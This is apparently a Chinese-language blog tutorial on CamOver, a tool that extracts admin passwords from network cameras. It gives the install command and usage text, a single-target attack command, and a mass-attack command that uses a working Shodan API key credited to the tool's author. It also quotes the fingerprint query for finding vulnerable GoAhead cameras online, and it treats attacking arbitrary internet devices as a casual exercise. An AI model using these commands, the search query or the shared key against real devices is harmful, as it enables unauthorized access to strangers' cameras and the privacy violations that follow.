Camover攝像頭利用
參考鏈接:https://mp.weixin.qq.com/s/sw4wNJisQ-uV0XoHLSfKKw
項目地址:https://github.com/EntySec/CamOver
安裝camover
pip3 install git+https://github.com/EntySec/CamOver
camover使用指南
使用方法: camover [-h] [-t] [-o OUTPUT] [-i INPUT] [-a ADDRESS] 。
[--shodan SHODAN] [--zoomeye ZOOMEYE] [-p PAGES]。
CamOver是一個利用攝像機的工具,可以披露網絡攝像機的管理密碼。
攝像機管理密碼。
可選參數。
-h, --help 顯示此幫助信息並退出
-t, --線程 使用線程以最快速度工作。
-o OUTPUT, --output OUTPUT
將結果輸出到文件。
-i INPUT, --input INPUT
輸入地址的文件。
-a ADDRESS, --address ADDRESS
單個地址。
--shodan SHODAN Shodan API密鑰,用於通過互聯網利用設備。
互聯網上的設備。
--zoomeye ZOOMEYE ZoomEye API密鑰,用於利用互聯網上的設備。
互聯網上的設備。
--p PAGES, --pages PAGES
你想從ZoomEye獲得的頁面數量。
使用camover
單點攻擊
camover -a 192.168.101.2
這是里是失敗時的樣子
通過網絡遠程攻擊
camover可以使用 Shodan 搜索引擎來搜索並攻擊網絡上的攝像頭,使用 -t 參數來設置多線程數量以獲得更好的性能:
camover -t --shodan PSKINdQe1GyxGgecYz2191H2JoS9qvgD
這個api是作者的,竟然能用,互聯網共享精神,respect!
搜尋原理
通過翻看文件,發現查找的關鍵詞
query='GoAhead 5ccc069c403ebaf9f0171e9517f40e41'
在zoomeye搜索,也能得到同樣的效果(剛買的fofa搜不到,差評)
然后翻看代碼發現,只要是用戶名不是admin的都是非脆弱的(😓)
然后通過撞大運的方式發現一個用戶名是admin的地址